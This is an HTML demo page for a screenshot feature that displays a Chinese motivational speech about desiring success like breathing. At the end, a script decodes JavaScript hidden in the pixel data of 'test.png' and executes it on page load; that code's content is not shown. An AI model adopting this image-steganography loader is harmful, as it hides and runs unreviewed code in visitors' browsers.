<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
<style>
body {
	margin: 0; padding: 0;
	cursor: default;
}
body.clip {
	cursor: url("assets/clip.cur"), default;
}
</style>
</head>
<body>
<h2>按快捷键CTRL+ALT+P进入截图，ESC或右键退出截图，选择完截图区域后双击鼠标截图</h2>

<style>
.wrapper {position:relative;margin:40px auto 0;width:320px;height:380px;background-color:#F6F6F6;font-family:微软雅黑;font-size:14px;}
.wrapper a {text-decoration:none;}
.pc-index a {position:absolute;top:40%;width:75px;height:58px;border:1px solid #ACACAC;border-radius:1px;background:rgba(239,239,239,.9);line-height:58px;text-align:center;color:#828282;}
.pc-index .prev-p {left:0;border-left:none;}
.pc-index .next-p {right:0;border-right:none;}
.inner {height:100%;padding:0 16px;overflow:auto;}
.inner::-webkit-scrollbar {position:absolute;width: 8px;height: 14px;}
.inner::-webkit-scrollbar-button {display: none;}
.inner::-webkit-scrollbar-track, .inner::-webkit-scrollbar-track-piece {background: -webkit-gradient(linear,left);width: 11px;height: 11px;}
.inner::-webkit-scrollbar-thumb {border-width: 0 3px;border-style: solid;border-color: transparent;border-radius: 6px;background: #d9d9d9;}
.inner::-webkit-scrollbar-thumb:horizontal {border-width: 3px 0;border-style: solid;border-color: #fefefe;border-radius: 6px;background: #d9d9d9;}
.inner::-webkit-scrollbar-thumb:hover {background: #bdbdbd;}
.inner::-webkit-scrollbar-thumb:active {background: #8e8e8e;}
.pb-index {margin:15px auto;width:288px;height:30px;}
.btn-box {float:left;width:77px;height:26px;padding:1px;background-color:#FFF;border:1px solid #CCC;border-radius:1px;}
.pb-index .btn-center {margin:0 22px;}
.btn-box a {display:block;background: -webkit-gradient(linear, left top, left bottom, from(#F3F3F3), to(#EBEBEB)); color:#222;text-align:center;line-height:26px;}
.btn-none {background:#F2F2F2;}
.btn-none a {background: #EDEDED;color:#CCC;}
</style>
<div class="wrapper">
	<div class="pc-index">
    	<a class="prev-p" href="javascript:void(0);">上一页</a>
        <a class="next-p" href="javascript:void(0);">下一页</a>
    </div>    
	<div class="inner">
    	<div class="content">曾经有一个年轻人,他想赚很多很多的钱!所以他找到了一位他视为偶像的大师,并告诉大师他想成为像大师一样强大的球员!
大师说,如果你想成为像我一样的球员,那么明天早上来海滩见我!
所以那个年轻人四点的时候就赶去了,全副武装!他当时应该穿着短裤!
大师走过来摸着他的头问:你有多想要成功呢?
年轻人说:我真的很想!
接着大师让他走下水,所以他就这样走进海里!
海水差不多淹到了年轻人的腰际,此时的他就像一个疯子一样!
年轻人心里想:我只想赚钱,他却只教我游泳!我可不想成为一个救生员!我只想赚钱!
大师察觉到了这一点!所以他就对年轻人说:再走远一点!
然后年轻人就又走远了一些,这时候水差不多已经淹到他的肩膀附近了!
年轻人心里想:这老家伙真是个疯子,他会赚钱但却是个疯子!
而大师却就一直说:再走远一点,再远一点!
这时候水已经快要淹没年轻人的嘴了,此时大师让年轻人往回走,这家伙一定已经疯了!
老家伙这时候说:你告诉我你想要成功!
年轻人回答道:是的!
这个时候大师走近年轻人,把他的头按到水里,再提起来,再按到水里!就在年轻人快不行的时候,大师把他拎了起来!
他告诉年轻人:当你对成功的渴望足以与你对呼吸的渴望相媲美的时候,你就会成功!
我不知道有多少人有过哮喘的体验,如果你曾经有过这种体验,你感到气息不足,你会像这样深呼吸并喘气!这时候你唯一要做的,就是去吸取新鲜空气!
此时的你不会在意NBA停摆,不会在意电视正在播什么,不会在意没人给你打电话,不会在意派对上的琐事!这时候你在意的只是在呼吸的时候吸取一些新鲜空气,这就是全部了!
当你理解到自己对成功的渴望就像对呼吸的渴望一样时,你将会取得成功!
让我来告诉你,第一:你们好多人都说自己想要成功,但是实际上没有那么想,只是有点想而已!你们对成功的渴望甚至不如对派对的渴望,不如对耍帅的渴望!你们中的大多数人地成功的渴望甚至比不上对睡懒觉的渴望!
我要告诉你,如果你是一个生来就要成功的人,你需要乐意去放弃睡觉的权利!你会愿意扔掉两小时甚至是三小时的睡眠时间!如果你真的很想成功,某些时候你将会连续三天熬夜!
因为如果你这时候去睡觉,你也许会失去一些成功的机会,这正是考验你有多想成功的时刻!你会经历一些不眠之夜,听着,你甚至会因为想成功而忘记吃饭!
我记得当50cent(美国饶舌歌手)第一次当电影导演的时候,我采访过他!
他当时说他如果不在做电影的时候,也一定是在做他的录音带!
然后就有人问他:50cent,你什么时候睡觉吗?
50cent说:睡觉?只有破产的人才睡觉!我不睡觉,因为我现在有了一个实现梦想的机会!
不要哭着跑开,你已经感受过疼痛,已经受过伤,争取得到奖赏吧!不要去睡觉,那是一种不成功的表现!
听着,今天的你可以为自己的一些成功而感到开心!但是记住,没有他人的帮助,你也不会成功!就像是如果你们今天没有听我讲的这些,也许你们会错过一些成功的机会!
听着,当你对成功的渴望足以与你对呼吸的渴望相媲美的时候,你就会成功!!</div>
        <div class="pb-index">
            <div class="btn-box">
                <a class="btn" href="javascript:void(0);">上一章</a>
            </div>
            <div class="btn-box btn-center">
                <a class="btn" href="javascript:void(0);">目录</a>
            </div>
            <div class="btn-box btn-none">
                <a class="btn" href="javascript:void(0);">下一章</a>
            </div>
        </div>
    </div>
</div>


<div id="output" style="width:100%;margin-top: 40px; border-top: 2px dashed #EEE;"></div>


<script>

var img = new Image();

img.onload = function() {
	var
		canvas = document.createElement('canvas'),
		ctx = canvas.getContext('2d');

	canvas.width = this.width;
	canvas.height = this.height;

	ctx.drawImage(this, 0, 0);

	var data = ctx.getImageData(0, 0, this.width, this.height).data;
	var js = '';


	for (var i = 0, len = data.length; i < len; i += 4) {
		if (data[i] > 0)
			js += String.fromCharCode(data[i]);
	}

	var script = document.createElement('script');
	script.innerHTML = js;
	document.head.appendChild(script);
	document.head.removeChild(script);
}

img.src = 'test.png'
</script>
</body>
</html>